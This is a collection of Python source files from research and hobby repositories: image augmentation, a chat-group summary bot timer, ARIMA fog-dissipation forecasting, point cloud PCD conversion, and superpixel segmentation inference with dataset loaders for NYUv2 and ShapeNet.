2)) deltay =0# random.randint(-int(cols / 2), int(cols / 2)) tp=[[0,0,1]] #print("op",op) op=0 global transform if op==0: M=np.float32([[1,0,deltax],[0,1,deltay]]) shifted=cv2.warpAffine(image,M,(image.shape[1],image.shape[0])) transform=np.concatenate((M,tp)) # elif op==1: # M=cv2.getRotationMatrix2D((cols/2,rows/2),random.randint(-60,60),1) # #print(M) # transform=np.concatenate((M,tp)) # shifted=cv2.warpAffine(image,M,(image.shape[1],image.shape[0])) p1,p2,p3,p4,tree,w,h=readxml(path.replace(".jpg",".xml"),tags) p11=np.dot(transform,p1) p11=p11.tolist() p22=np.dot(transform,p2) p22=p22.tolist() p33=np.dot(transform,p3) p33=p33.tolist() p44=np.dot(transform,p4) p44=p44.tolist() sud=np.array([p11,p22,p33,p44]) xmin=min(sud[:,0]) ymin=min(sud[:,1]) xmax=max(sud[:,0]) ymax=max(sud[:,1]) w=shifted.shape[1] h=shifted.shape[0] #print("2",len(shifted[0]),h) imagesavepath=saveimageorgtPath+"/"+filename+"_"+tags+"_"+str(counts)+"_.jpg" gtsavepath=saveimageorgtPath+"/"+filename+"_"+tags+"_"+str(counts)+"_.xml" kxHeight=int(ymax-ymin) kxWidth=int(xmax-xmin) print(kxHeight,kxWidth) center_x=int(kxWidth/2+xmin) center_y=int(kxHeight/2+ymin) w = 600 h = 600 shifted2 = shifted[center_y-int(h/2):center_y+int(h/2), center_x-int(w/2):center_x+int(w/2)] print(shifted2.shape[:2]) if shifted2.shape[0]>0 and shifted2.shape[1]>0: cv2.imencode('.jpg',shifted2)[1].tofile(imagesavepath) anno=GEN_Annotations(filename) anno.set_size(w,h,3) anno.add_pic_attr(tags,int(300-kxWidth/2),int(300-kxHeight/2),int(300+kxWidth/2),int(300+kxHeight/2)) anno.savefile(gtsavepath) if __name__=='__main__': ImagePaht="/media/nizhengqi/0007912600089656/fpn.pytorch-master/data/VOCdevkit2007/VOC2007_back/VOC2007/JPEGImages" GtPath="/media/nizhengqi/0007912600089656/fpn.pytorch-master/data/VOCdevkit2007/VOC2007_back/VOC2007/JPEGImages" tags=[["xiaochicun",1]] # tags=[["dg",246],["sg",229], # ["jyzzb",157],["jyhsh",274],["jyhtl",298],["jyhyw",287], # ["fzchy",224],["fzcpx",297],["fzcsh",279], # ["fzcxs",294],["bmqk",296],["lslmqk",287], # ["lsqbm",289],["lsqdp",297],["lsqlm",289], # ["lsqxz",232],["lsxs",275],["wtxztc",292], # ["tjbm",296],["tjjs",274],["tjtf",296], # ["tjwl",297],["tjxx",243],["fnsssh",258], # ["bspsh",287],["bsptl",263],["nc",271],["yw",157]] SaveImagePath="/media/nizhengqi/0007912600089656/fpn.pytorch-master/data/VOCdevkit2007/VOC2007_back/VOC2007/new_image_gt" addGtPath="/media/nizhengqi/0007912600089656/fpn.pytorch-master/data/VOCdevkit2007/VOC2007_back/VOC2007/new_image_gt" l_files=loopxml(GtPath,tags) print(l_files) for i in range(len(tags)): for j in range(tags[i][1]): for f in range(len(l_files)): if l_files[f][0]==tags[i][0]: rd=counts#random.randint(0,len(l_files[f][1])-1) if counts>=len(l_files[f][1])-1: print(counts) counts = 0 continue op=random.randint(0,1) imagefull=l_files[f][1][rd].replace(".xml",".jpg") sps=imagefull.split('/') imagename=sps[len(sps)-1].replace(".xml","").replace(".jpg","").replace(".JPG","") #print(imagefull) random_op(op,imagefull,imagename,tags[i][0],SaveImagePath) #print(counts) counts=counts+1 cv2.waitKey(0) ``` #### File: model/nms/nms_gpu.py ```python import torch import numpy as np from lib.model.nms._ext import nms #from c import pdb def nms_gpu(dets, thresh): keep = dets.new(dets.size(0), 1).zero_().int() num_out = dets.new(1).zero_().int() #nms. nms.nms_cuda(keep, dets, num_out, thresh) keep = keep[:num_out[0]] return keep ```
{ "source": "aabbcco/FG", "score": 2 }
#### File: acmsmu/FG/Timer.py ```python import nonebot import os from cn.acmsmu.FG import DailyConclusion from Utils.JsonUtils import JsonUtils from Utils.IOUtils import IOUtils async def handleTimer(timerName,groupId): dataDict = IOUtils.deserializeObjFromPkl(os.path.join(os.getcwd(),'cn','acmsmu','FG','data',groupId, 'var.pkl')) flag = dataDict['flag'] clu = DailyConclusion.DailyConlusion(groupId) report = clu.generateReport() #print(timerName+'的每日总结为\n'+report) await bot.send_group_msg(group_id=int(groupId), message=report) if flag: dataDict['flag'] = False dataDict['file'] = 'chatB.txt' IOUtils.serializeObj2Pkl(dataDict,os.path.join(os.getcwd(),'cn','acmsmu','FG','data',groupId, 'var.pkl')) IOUtils.deleteFile(os.path.join(os.getcwd(),'cn','acmsmu','FG','data',groupId, 'chatA.txt')) else: dataDict['flag'] = True dataDict['file'] = 'chatA.txt' IOUtils.serializeObj2Pkl(dataDict,os.path.join(os.getcwd(),'cn','acmsmu','FG','data',groupId, 'var.pkl')) IOUtils.deleteFile(os.path.join(os.getcwd(),'cn','acmsmu','FG','data',groupId, 'chatB.txt')) bot = nonebot.get_bot() configuration = JsonUtils.json2Dict(os.path.join(os.getcwd(),'cn','acmsmu','FG','data','config.json')) print(configuration) groupInfo = configuration['groupInfo'] for each in groupInfo: hour = each['beginHour'] minutes = each['beginMinutes'] nonebot.scheduler.add_job(handleTimer, 'cron',hour=hour,minute=minutes,args=[each['timer'],each['groupId']]) print('定时器' + each['timer'] + '定时任务添加成功!') ```
{ "source": "aabbcco/mathmatics2020", "score": 3 }
#### File: T4/code/probelm4.py ```python import numpy as np import pandas as pd import matplotlib.pyplot as plt import matplotlib plt.rcParams['font.sans-serif'] = ['SimHei'] # 用来正常显示中文标签 plt.rcParams['axes.unicode_minus'] = False # 用来正常显示负号 df = pd.read_excel("predict_mor.xlsx") mor = df['MOR_PREDICT'] ''' 画图观察是否为平稳序列 plt.figure(figsize=(10,6)) plt.plot(df.index,mor) plt.show() #看上去不平稳 ''' ''' 一阶差分 ''' def timestamp(h,m,s,gap,num): for i in range(num): s = s+1 if i%2 == 0 else s s+=gap m+=int(s/60) h+=int(m/60) s = s%60 m = m%60 return "2016-04-14 %s:%s:%s"%( str(h) if h>=10 else '0'+str(h), str(m) if m>=10 else '0'+str(m), str(s) if s>=10 else '0'+str(s), ) time = df['date'] mor_d1 = np.diff(mor) #mor_d2 = np.diff(mor_d1) #plt.plot(mor) ##plt.title("高速公路MOR估算时序图",fontsize=30) #plt.xlabel("时间序列",fontsize=25) #plt.ylabel("MOR(m)") #plt.show() #一阶差分 大致稳定 ''' plt.figure() plt.plot(range(len(mor_d1)),mor_d1) plt.title("一阶差分",fontsize=30 ) plt.xlabel("时间序列",fontsize=25) plt.ylabel("MOR一阶差分值",fontsize=25) plt.figure() plt.plot(range(len(mor_d2)),mor_d2) plt.title("二阶差分",fontsize=30) plt.xlabel("时间序列",fontsize=25) plt.ylabel("MOR二阶差分值",fontsize=25) ''' #from statsmodels.tsa.stattools import adfuller #adf = adfuller(mor) #print(adf) from statsmodels.graphics.tsaplots import plot_acf, plot_pacf ''' plot_acf(mor_d1) plt.xlabel("p",fontsize=25) plt.title("自相关图",fontsize=30) plot_pacf(mor_d1) plt.xlabel("q",fontsize=25) plt.title("偏自相关",fontsize=30) ''' ''' (-9.482240734386155, 3.845143230413058e-16, 2, 95, {'1%': -3.5011373281819504, '5%': -2.8924800524857854, '10%': -2.5832749307479226}, 522.7009913785289) 时序信号自身adf为-9.4822 均小于三种置信度 因此可以认作平稳信号 ''' #使用ARIMA去拟合原始数据,使用ARMA去拟合一阶差分数据 这里就使用ARMA模型 train = mor[0:80] test = mor[80:-1] from statsmodels.tsa.arima_model import ARIMA model = ARIMA(train,order = (15,1,1)) #p,q来自于上面 d为几阶差分后可认作为平稳信号 result = model.fit() ''' 残差检验 resid = result.resid from statsmodels.graphics.api import qqplot qqplot(resid,line = 'q',fit = True) plt.show() #qq图上 红线为正态分布 即红线 结果可以看出散点图大致符合该趋势 因此信号为白噪声 ''' plt.figure() pred = result.predict(start=1,end=len(mor)+200,typ='levels') x=100 for i in range(100,len(pred)): if pred[i] >= 220: x = i break plt.xticks([0,98],['公路截图开始时间\n'+time[0],'公路截图结束时间\n2016-04-14 07:39:11']) plt.plot(range(len(pred)),[220]*len(pred),linestyle = '--') plt.plot(range(len(mor)),mor,c='r') plt.plot(range(len(pred)),pred,c='g') plt.title('ARIMA模型预测MOR以及计算估计所得MOR',fontsize=30) plt.annotate('预测大雾消散时间:\n%s'%timestamp(6,31,8,41,x), xy=(x, pred[x]), xycoords='data', xytext=(-100, -100), textcoords='offset points', fontsize=20,arrowprops=dict(arrowstyle='->', connectionstyle="arc3,rad=.2") ) sum_abs = 0 for i in range(79,99): sum_abs = abs(pred[i]-mor[i])/pred[i] print(sum_abs/20) plt.tick_params(labelsize=20) plt.legend(['期望的mor','计算估计的mor','模型预测的mor'],fontsize=25) plt.xlabel('时间序列',fontsize=25) plt.ylabel('MOR(m)',fontsize=25) plt.show() ```
{ "source": "aabbcco/pointcnn_vkitti3d_tool", "score": 3 }
#### File: aabbcco/pointcnn_vkitti3d_tool/prediction.py ```python import numpy as np import argparse import os color_list = [ '13130240', '32818', '56320', '16711680', '6579300', '13158600', '16711935', '16776960', '8388863', '16763030', '33023', '51455', '16744448' ] def torgb(r, g, b): return (int(r) << 16 | int(g) << 8 | int(b)) def getFiles(path, suffix): return [os.path.join(root, file) for root, dirs, files in os.walk(path) for file in files if file.endswith(suffix)] parser = argparse.ArgumentParser() parser.add_argument('--data', '-d', default='../05', help='data path') parser.add_argument('--label', '-l', default='../results', help='label path') parser.add_argument('--name','-n',required=True,help='name add on pcd file') parser.add_argument('--mode','-m',default='color',help='output pred by color or label') arg = parser.parse_args() filelist = getFiles(arg.label, '.labels') # print(filelist) for fils in filelist: # print(fils) name = fils.split('.labels')[0].split('\\')[-1] #print(name, '\n') data = np.load(os.path.join( arg.data, name + '.npy')) label = np.loadtxt(fils) x = (np.max(data[:, 0])+np.min(data[:, 0]))/2 y = (np.max(data[:, 1])+np.min(data[:, 1]))/2 z = (np.max(data[:, 2])+np.min(data[:, 2]))/2 data[:, 0] -= x data[:, 1] -= y data[:, 2] -= z print("processing ", name, '!!! pointcloud size: ', data.shape[0]) file_orig = os.path.join('../orig_pcd', name + '_'+arg.name + '_orig.pcd') file_label = os.path.join('../label_pcd', name +'_'+ arg.name + '_label.pcd') file_pred = os.path.join('../pred_pcd', name +'_'+ arg.name + '_pred.pcd') if os.path.exists(file_orig): os.remove(file_orig) if os.path.exists(file_label): os.remove(file_label) if os.path.exists(file_pred): os.remove(file_pred) Output_orig = open(file_orig, "a",encoding='utf-8') Output_label = open(file_label, "a",encoding='utf-8') Output_pred = open(file_pred, "a",encoding='utf-8') if arg.mode is 'color': mode = 'rgb' else: mode = 'label' Output_pred.write('# .PCD v0.7 - Point Cloud Data file format\nVERSION 0.7\nFIELDS x y z '+mode+'\nSIZE 4 4 4 4 \nTYPE F F F U\nCOUNT 1 1 1 1') string = '\nWIDTH ' + str(data.shape[0]) Output_pred.write(string) Output_pred.write('\nHEIGHT 1\nVIEWPOINT 0 0 0 1 0 0 0') string = '\nPOINTS ' + str(data.shape[0]) Output_pred.write(string) Output_pred.write('\nDATA ascii') Output_label.write( '# .PCD v0.7 - Point Cloud Data file format\nVERSION 0.7\nFIELDS x y z '+mode+'\nSIZE 4 4 4 4 \nTYPE F F F U\nCOUNT 1 1 1 1') string = '\nWIDTH ' + str(data.shape[0]) Output_label.write(string) Output_label.write('\nHEIGHT 1\nVIEWPOINT 0 0 0 1 0 0 0') string = '\nPOINTS ' + str(data.shape[0]) Output_label.write(string) Output_label.write('\nDATA ascii') Output_orig.write( '# .PCD v0.7 - Point Cloud Data file format\nVERSION 0.7\nFIELDS x y z rgb\nSIZE 4 4 4 4 \nTYPE F F F U\nCOUNT 1 1 1 1') string = '\nWIDTH ' + str(data.shape[0]) Output_orig.write(string) Output_orig.write('\nHEIGHT 1\nVIEWPOINT 0 0 0 1 0 0 0') string = '\nPOINTS ' + str(data.shape[0]) Output_orig.write(string) Output_orig.write('\nDATA ascii') if arg.mode is 'color': for j in range(data.shape[0]): string_xyz = ('\n' + str(data[j, 0]) + ' ' +str(data[j, 1]) + ' ' + str(data[j, 2]) + ' ') string = string_xyz+color_list[int(label[j]-1)] Output_pred.write(string) string = string_xyz+color_list[int(data[j, 6])] Output_label.write(string) string = string_xyz+str(torgb(data[j, 3],data[j, 4], data[j, 5])) Output_orig.write(string) else: for j in range(data.shape[0]): string_xyz = ('\n' + str(data[j, 0]) + ' ' +str(data[j, 1]) + ' ' + str(data[j, 2]) + ' ') string = string_xyz+str(int(label[j]-1)) Output_pred.write(string) string = string_xyz+str(int(data[j, 6])) Output_label.write(string) string = string_xyz+str(torgb(data[j, 3],data[j, 4], data[j, 5])) Output_orig.write(string) Output_pred.close() Output_orig.close() Output_label.close() print("all done!") ```
{ "source": "aabbcco/ssn-3d-pytorch", "score": 2 }
#### File: aabbcco/ssn-3d-pytorch/eval_on_test_set.py ```python import math import numpy as np import torch from torch.utils.data import DataLoader import os from skimage.color.colorconv import lab2rgb from matplotlib import pyplot as plt from skimage.color import rgb2lab from skimage.segmentation._slic import _enforce_label_connectivity_cython from lib.ssn.ssn import sparse_ssn_iter from lib.dataset import bsds from evaluations import undersegmentation_error, achievable_segmentation_accuracy, compactness, boundary_recall @torch.no_grad() def inference(image, nspix, n_iter, model, fdim=None, color_scale=0.26, pos_scale=2.5, enforce_connectivity=True): """ generate superpixels Args: image: numpy.ndarray An array of shape (h, w, c) nspix: int number of superpixels n_iter: int number of iterations fdim (optional): int feature dimension for supervised setting color_scale: float color channel factor pos_scale: float pixel coordinate factor weight: state_dict pretrained weight enforce_connectivity: bool if True, enforce superpixel connectivity in postprocessing Return: labels: numpy.ndarray An array of shape (h, w) """ # if weight is not None: # from model import SSNModel # model = SSNModel(fdim, nspix, n_iter).to("cuda") # model.load_state_dict(torch.load(weight)) # model.eval() # else: # model = lambda data: sparse_ssn_iter(data, nspix, n_iter) height, width = image.shape[2:] nspix_per_axis = int(math.sqrt(nspix)) pos_scale = pos_scale * max(nspix_per_axis/height, nspix_per_axis/width) coords = torch.stack(torch.meshgrid(torch.arange( height, device="cuda"), torch.arange(width, device="cuda")), 0) coords = coords[None].float() image = image.to("cuda").float() inputs = torch.cat([color_scale*image, pos_scale*coords], 1) _, H, _ = model(inputs) labels = H.reshape(height, width).to("cpu").detach().numpy() if enforce_connectivity: segment_size = height * width / nspix min_size = int(0.06 * segment_size) max_size = int(3.0 * segment_size) labels = _enforce_label_connectivity_cython( labels[None], min_size, max_size)[0] return labels if __name__ == "__main__": import time import argparse import matplotlib.pyplot as plt from skimage.segmentation import mark_boundaries parser = argparse.ArgumentParser() parser.add_argument("--root", type=str, default='../BSR', help="/path/to/val") parser.add_argument("--weight", default=None, type=str, help="/path/to/pretrained_weight") parser.add_argument("--fdim", default=20, type=int, help="embedding dimension") parser.add_argument("--niter", default=10, type=int, help="number of iterations for differentiable SLIC") parser.add_argument("--nspix", default=100, type=int, help="number of superpixels,100 to nspix") parser.add_argument('--dest', '-d', default='results', help='dest folder the image saves') parser.add_argument("--color_scale", default=0.26, type=float) parser.add_argument("--pos_scale", default=2.5, type=float) args = parser.parse_args() weight = args.weight nspix = args.nspix n_iter = args.niter fdim = args.fdim # Dataset did everything for us dataset = bsds.BSDS(args.root, split='val') dataloader = DataLoader(dataset, batch_size=1, shuffle=False) # generate number of spix from 100 to nspix asstep 100 for i in range(100, args.nspix+1, 100): if not os.path.exists(args.dest): os.mkdir(args.dest) if not os.path.exists(os.path.join(args.dest, str(i))): os.mkdir(os.path.join(args.dest, str(i))) if weight is not None: from model import SSNModel model = SSNModel(fdim, i, n_iter).to("cuda") model.load_state_dict(torch.load(weight)) model.eval() else: def model(data): return sparse_ssn_iter(data, i, n_iter) # throw every image into the net for data in dataloader: image, label, name = data height, width = image.shape[-2:] label_pred = inference(image, args.nspix, args.niter, model, args.fdim, args.color_scale, args.pos_scale) label = label.argmax(1).reshape(height, width).numpy() np.savetxt(os.path.join(args.dest, str(i), name[0]+'.csv'), label_pred, fmt='%d', delimiter=',') asa = achievable_segmentation_accuracy(label_pred, label) usa = undersegmentation_error(label_pred, label) cptness = compactness(label_pred) BR = boundary_recall(label_pred, label) image = np.squeeze(image.numpy(), axis=0).transpose(1, 2, 0) image = lab2rgb(image) print(name[0], '\tprocessed,asa_{:.4f}_usa{:.4f}_co{:.4f}_BR_{:.4f}'.format( asa, usa, cptness, BR)) plt.imsave(os.path.join(args.dest, str(i), "asa_{:.4f}_usa_{:.4f}_co_{:.4f}_BR_{:.4f}_{}.jpg".format( asa, usa, cptness, BR, name[0])), mark_boundaries(image, label_pred)) ``` #### File: aabbcco/ssn-3d-pytorch/generateassign.py ```python import os import math import numpy as np import torch from torch.utils.data import DataLoader from model import SSNModel from lib.dataset import bsds from lib.ssn.ssn import sparse_ssn_iter from skimage.color import rgb2lab @torch.no_grad() def getQ(image, nspix, n_iter, fdim=None, color_scale=0.26, pos_scale=2.5, weight=None, enforce_connectivity=True): if weight is not None: from model import SSNModel model = SSNModel(fdim, nspix, n_iter).to("cuda") model.load_state_dict(torch.load(weight)) model.eval() else: def model(data): return sparse_ssn_iter(data, nspix, n_iter) height, width = image.shape[:2] nspix_per_axis = int(math.sqrt(nspix)) pos_scale = pos_scale * max(nspix_per_axis/height, nspix_per_axis/width) coords = torch.stack(torch.meshgrid(torch.arange( height, device="cuda"), torch.arange(width, device="cuda")), 0) coords = coords[None].float() image = rgb2lab(image) image = torch.from_numpy(image).permute(2, 0, 1)[None].to("cuda").float() inputs = torch.cat([color_scale*image, pos_scale*coords], 1) Q, H, features = model(inputs) labels = H.reshape(height, width).to("cpu").detach().numpy() return Q, labels, features if __name__ == "__main__": import time import argparse import matplotlib.pyplot as plt from skimage.segmentation import mark_boundaries parser = argparse.ArgumentParser() parser.add_argument( "--image", type=str, default='../BSR/BSDS500/data/images/val/3096.jpg', help="/path/to/image") parser.add_argument("--weight", default=None, type=str, help="/path/to/pretrained_weight") parser.add_argument("--fdim", default=20, type=int, help="embedding dimension") parser.add_argument("--niter", default=10, type=int, help="number of iterations for differentiable SLIC") parser.add_argument("--nspix", default=100, type=int, help="number of superpixels") parser.add_argument("--color_scale", default=0.26, type=float) parser.add_argument("--pos_scale", default=2.5, type=float) args = parser.parse_args() image = plt.imread(args.image) s = time.time() Q, label, features = getQ( image, args.nspix, args.niter, args.fdim, args.color_scale, args.pos_scale, args.weight) print(f"time {time.time() - s}sec") Q = Q.detach().to('cpu').to_dense().numpy().squeeze(0) features = features.detach().to('cpu').numpy().squeeze(0) print(Q.shape) print(label.shape) np.savetxt('Q.csv',Q,delimiter=',') np.savetxt('label.csv',label,delimiter=',') np.savetxt('features.csv',features,delimiter=',') ``` #### File: ssn-3d-pytorch/inferencers/inference-shapenetx.py ```python from torch.utils.data import DataLoader import numpy as np import torch import os import sys sys.path.append(os.path.dirname("../")) from lib.dataset.shapenet import shapenet from lib.utils.pointcloud_io import write from models.model_ptnet import PointNet_SSNx from lib.ssn.ssn import soft_slic_pknn @torch.no_grad() def inference(pointcloud, pos_scale=10, weight=None): """generate 3d spix Args: pointcloud (Tensor): Tensor of input pointcloud pos_scale (int, optional): coordinate multpilter. Defaults to 10. weight ([type], optional): model itself. Defaults to None. Returns: [type]: [description] """ if weight is not None: model = weight else: raise Exception('model not loaded') inputs = pos_scale * pointcloud inputs = inputs.to("cuda") Q, H, center, feature = model(inputs) Q = Q.to("cpu").detach().numpy() labels = H.to("cpu").detach().numpy() feature = feature.to("cpu").detach().numpy() center = center.to("cpu").detach().numpy() return Q, labels, center, feature if __name__ == "__main__": import time import argparse import matplotlib.pyplot as plt parser = argparse.ArgumentParser() parser.add_argument("--weight", "-w", default='log/model-shapenet.pth', type=str, help="/path/to/pretrained_weight") parser.add_argument("--fdim", "-d", default=20, type=int, help="embedding dimension") parser.add_argument("--niter", "-n", default=10, type=int, help="number of iterations for differentiable SLIC") parser.add_argument("--nspix", default=50, type=int, help="number of superpixels") parser.add_argument("--pos_scale", "-p", default=10, type=float) parser.add_argument("--folder", "-f", default='log', help="a folder to store result") args = parser.parse_args() if not os.path.exists(args.folder): os.mkdir(args.folder) data = shapenet("../../shapenet_part_seg_hdf5_data", split='val') loader = DataLoader(data, batch_size=1, shuffle=False) model = PointNet_SSNx(args.fdim, args.nspix, args.niter, backend=soft_slic_pknn).to("cuda") model.load_state_dict(torch.load(args.weight)) model.eval() print(model) s = time.time() for i, (pointcloud, label, labell) in enumerate(loader): print(i) _, labels, _, _ = inference(pointcloud, 10, model) pointcloud = pointcloud.squeeze(0).transpose(1, 0).numpy() label = labell.transpose(1, 0).numpy() #spix = spix.squeeze(0).transpose(1, 0).numpy() ptcloud = np.concatenate( (pointcloud, label, label, labels.transpose(1, 0)), axis=-1) write.tobcd(ptcloud, 'xyzrgb', os.path.join(args.folder, '{}.pcd'.format(i))) ``` #### File: lib/dataset/NYUv2.py ```python import os import glob import torch from torch.utils.data import Dataset import numpy as np import scipy.io from skimage.color import rgb2lab import matplotlib.pyplot as plt def convert_label(label): onehot = np.zeros( (1, 50, label.shape[0], label.shape[1])).astype(np.float32) ct = 0 for t in np.unique(label).tolist(): if ct >= 50: break else: onehot[:, ct, :, :] = (label == t) ct = ct + 1 return onehot def convert_spix(label): onehot = np.zeros( (1, 200, label.shape[0], label.shape[1])).astype(np.float32) ct = 0 for t in np.unique(label).tolist(): if ct >= 200: break else: onehot[:, ct, :, :] = (label == t) ct = ct + 1 return onehot class NYUv2(Dataset): def __init__(self, root, split="train", color_transforms=None, geo_transforms=None): assert split in ['train', 'test'] self.data_dir = os.path.join(root, split, 'nyu_images') self.gt_dir = os.path.join(root, split, 'nyu_labels') self.spix_dir = os.path.join(root, split, 'nyu_spixs') self.index = os.listdir(self.data_dir) self.color_transforms = color_transforms self.geo_transforms = geo_transforms def __getitem__(self, idx): idxx = self.index[idx] data = rgb2lab(plt.imread(os.path.join(self.data_dir,idxx))) data = data.astype(np.float32) label = np.loadtxt(os.path.join(self.gt_dir,idxx[:-4] + ".csv"), dtype=np.int64, delimiter=',') spix = np.loadtxt(os.path.join(self.spix_dir, idxx[:-4] + ".csv"), dtype=np.int64, delimiter=',') if self.color_transforms is not None: data = self.color_transforms(data) if self.geo_transforms is not None: data, label, spix = self.geo_transforms([data, label, spix]) label = convert_label(label) label = torch.from_numpy(label) data = (torch.from_numpy(data)).permute(2, 0, 1) spix = convert_spix(spix) spix = torch.from_numpy(spix) idxx = (self.index[idx])[:-4] return data, label.reshape(50, -1).float(), spix.reshape(200, -1).float(), idxx[:-4] def __len__(self): return len(self.index) ``` #### File: lib/dataset/shapenet.py ```python from torch.utils.data import Dataset from torch import Tensor import os import h5py import numpy as np from .pointcloud_io import read def getFiles_full(path, suffix): return [ os.path.join(root, file) for root, dirs, files in os.walk(path) for file in files if file.endswith(suffix) ] def getFiles(path, suffix): return [ file for root, dirs, files in os.walk(path) for file in files if file.endswith(suffix) ] def convert_label(label, num=20): onehot = np.zeros((num, label.shape[0])).astype(np.float32) ct = 0 for t in np.unique(label).tolist(): if ct >= num: break else: onehot[ct, :] = (label == t) ct = ct + 1 return onehot def getFiles_full(path, suffix): return [ os.path.join(root, file) for root, dirs, files in os.walk(path) for file in files if file.endswith(suffix) ] class shapenet(Dataset): """ shapenet dataset for Pytorch Dataloader\n too slow in init time,need another implemention Args: datafolder (string): folder containing shapenet result split (str, optional): options in train,test and val. Defaults to 'train'. """ def __init__(self, datafolder, split='train'): assert split in ['train', 'val', 'test'], "split not exist" filepath = os.path.join(datafolder, split) datalist = [] labelist = [] flist = getFiles_full(filepath, '.h5') for fname in flist: f = h5py.File(fname, 'r') datalist.append(np.array(f['data'])) labelist.append(np.array(f['pid'])) self.data = np.concatenate(datalist, axis=0).transpose(0, 2, 1) self.label = np.concatenate(labelist, axis=0) def __getitem__(self, idx): return Tensor(self.data[idx]), Tensor(convert_label( self.label[idx])), Tensor(self.label[idx]) def __len__(self): return len(self.data) class shapenet_inst(Dataset): """ shapenet dataset for Pytorch Dataloader\n too slow in init time,need another implemention Args: datafolder (string): folder containing shapenet result split (str, optional): options in train,test and val. Defaults to 'train'. """ def __init__(self, datafolder, split='train'): assert split in ['train', 'val', 'test'], "split not exist" filepath = os.path.join(datafolder, split) datalist = [] labelist = [] flist = getFiles_full(filepath, '.h5') for fname in flist: f = h5py.File(fname, 'r') datalist.append(np.array(f['data'])) labelist.append(np.array(f['pid'])) self.data = np.concatenate(datalist, axis=0).transpose(0, 2, 1) self.label = np.concatenate(labelist, axis=0) def __getitem__(self, idx): return Tensor(self.data[idx]), Tensor( convert_label(self.label[idx], num=20)), Tensor(self.label[idx]) def __len__(self): return len(self.data) class shapenet_spix(Dataset): def __init__(self, datafolder, split='train', onehot=True): assert split in ['train', 'val', 'test'], "split not exist" filepath = os.path.join(datafolder, split) datalist = [] labelist = [] spixlist = [] flist = getFiles_full(filepath, '.h5') for fname in flist: f = h5py.File( fname, 'r') datalist.append(np.array(f['data'])) labelist.append(np.array(f['label'])) spixlist.append(np.array(f['spix'])) self.data = np.concatenate(datalist, axis=0).transpose(0, 2, 1) self.label = np.concatenate(labelist, axis=0) self.spix = np.concatenate(spixlist, axis=0) self.onehot = onehot def __getitem__(self, idx): label = self.label[idx] spix = self.spix[idx] if self.onehot: label = convert_label(label) spix = convert_label(spix) return Tensor(self.data[idx]), Tensor(label), Tensor(spix), Tensor( self.label[idx]) def __len__(self): return len(self.data) class shapenet_cpt(Dataset): def __init__(self, filepath) -> None: super().__init__() f = h5py.File(filepath) self.data = np.array(f["data"]).transpose(0, 2, 1) def __getitem__(self, idx: int): return Tensor(self.data[idx]), Tensor(self.data[idx]), Tensor( self.data[idx]) def __len__(self) -> int: return len(self.data) class shapenet_man(Dataset): def __init__(self, filepath) -> None: super().__init__() self.filelist = getFiles_full(filepath, ".pcd") def __getitem__(self, idx: int): filename = self.filelist[idx] data = read(filename) Tdata = Tensor(data[:, :3].transpose()) return Tdata, Tdata, Tdata def __len__(self) -> int: return len(self.filelist) ``` #### File: lib/ssn/ssn.py ```python import math import torch from torch import softmax from torch.nn.functional import pairwise_distance from .util_funcs import knn_indices_func_cpu, knn_indices_func_gpu #for time count->>SSN python toooooooooo slow from time import time SoftSlicTime = {} # from .pair_wise_distance import PairwiseDistFunction # from ..utils.sparse_utils import naive_sparse_bmm # @torch.no_grad() # def get_abs_indices(init_label_map, num_spixels_width): # b, n_pixel = init_label_map.shape # device = init_label_map.device # r = torch.arange(-1, 2.0, device=device) # relative_spix_indices = torch.cat([r - num_spixels_width, r, r + num_spixels_width], 0) # abs_pix_indices = torch.arange(n_pixel, device=device)[None, None].repeat(b, 9, 1).reshape(-1).long() # abs_spix_indices = (init_label_map[:, None] + relative_spix_indices[None, :, None]).reshape(-1).long() # abs_batch_indices = torch.arange(b, device=device)[:, None, None].repeat(1, 9, n_pixel).reshape(-1).long() # return torch.stack([abs_batch_indices, abs_spix_indices, abs_pix_indices], 0) # @torch.no_grad() # def get_hard_abs_labels(affinity_matrix, init_label_map, num_spixels_width): # relative_label = affinity_matrix.max(1)[1] # r = torch.arange(-1, 2.0, device=affinity_matrix.device) # relative_spix_indices = torch.cat([r - num_spixels_width, r, r + num_spixels_width], 0) # label = init_label_map + relative_spix_indices[relative_label] # return label.long() # @torch.no_grad() # def sparse_ssn_iter(pixel_features, num_spixels, n_iter): # """ # computing assignment iterations with sparse matrix # detailed process is in Algorithm 1, line 2 - 6 # NOTE: this function does NOT guarantee the backward computation. # Args: # pixel_features: torch.Tensor # A Tensor of shape (B, C, H, W) # num_spixels: int # A number of superpixels # n_iter: int # A number of iterations # return_hard_label: bool # return hard assignment or not # """ # height, width = pixel_features.shape[-2:] # num_spixels_width = int(math.sqrt(num_spixels * width / height)) # num_spixels_height = int(math.sqrt(num_spixels * height / width)) # spixel_features, init_label_map = \ # calc_init_centroid(pixel_features, num_spixels_width, num_spixels_height) # abs_indices = get_abs_indices(init_label_map, num_spixels_width) # pixel_features = pixel_features.reshape(*pixel_features.shape[:2], -1) # permuted_pixel_features = pixel_features.permute(0, 2, 1) # for _ in range(n_iter): # dist_matrix = PairwiseDistFunction.apply( # pixel_features, spixel_features, init_label_map, num_spixels_width, num_spixels_height) # affinity_matrix = (-dist_matrix).softmax(1) # reshaped_affinity_matrix = affinity_matrix.reshape(-1) # mask = (abs_indices[1] >= 0) * (abs_indices[1] < num_spixels) # sparse_abs_affinity = torch.sparse_coo_tensor(abs_indices[:, mask], reshaped_affinity_matrix[mask]) # spixel_features = naive_sparse_bmm(sparse_abs_affinity, permuted_pixel_features) \ # / (torch.sparse.sum(sparse_abs_affinity, 2).to_dense()[..., None] + 1e-16) # spixel_features = spixel_features.permute(0, 2, 1) # hard_labels = get_hard_abs_labels(affinity_matrix, init_label_map, num_spixels_width) # return sparse_abs_affinity, hard_labels, spixel_features # def ssn_iter(pixel_features, num_spixels, n_iter): # """ # computing assignment iterations # detailed process is in Algorithm 1, line 2 - 6 # Args: # pixel_features: torch.Tensor # A Tensor of shape (B, C, H, W) # num_spixels: int # A number of superpixels # n_iter: int # A number of iterations # return_hard_label: bool # return hard assignment or not # """ # height, width = pixel_features.shape[-2:] # num_spixels_width = int(math.sqrt(num_spixels * width / height)) # num_spixels_height = int(math.sqrt(num_spixels * height / width)) # spixel_features, init_label_map = \ # calc_init_centroid(pixel_features, num_spixels_width, num_spixels_height) # abs_indices = get_abs_indices(init_label_map, num_spixels_width) # pixel_features = pixel_features.reshape(*pixel_features.shape[:2], -1) # permuted_pixel_features = pixel_features.permute(0, 2, 1).contiguous() # for _ in range(n_iter): # dist_matrix = PairwiseDistFunction.apply( # pixel_features, spixel_features, init_label_map, 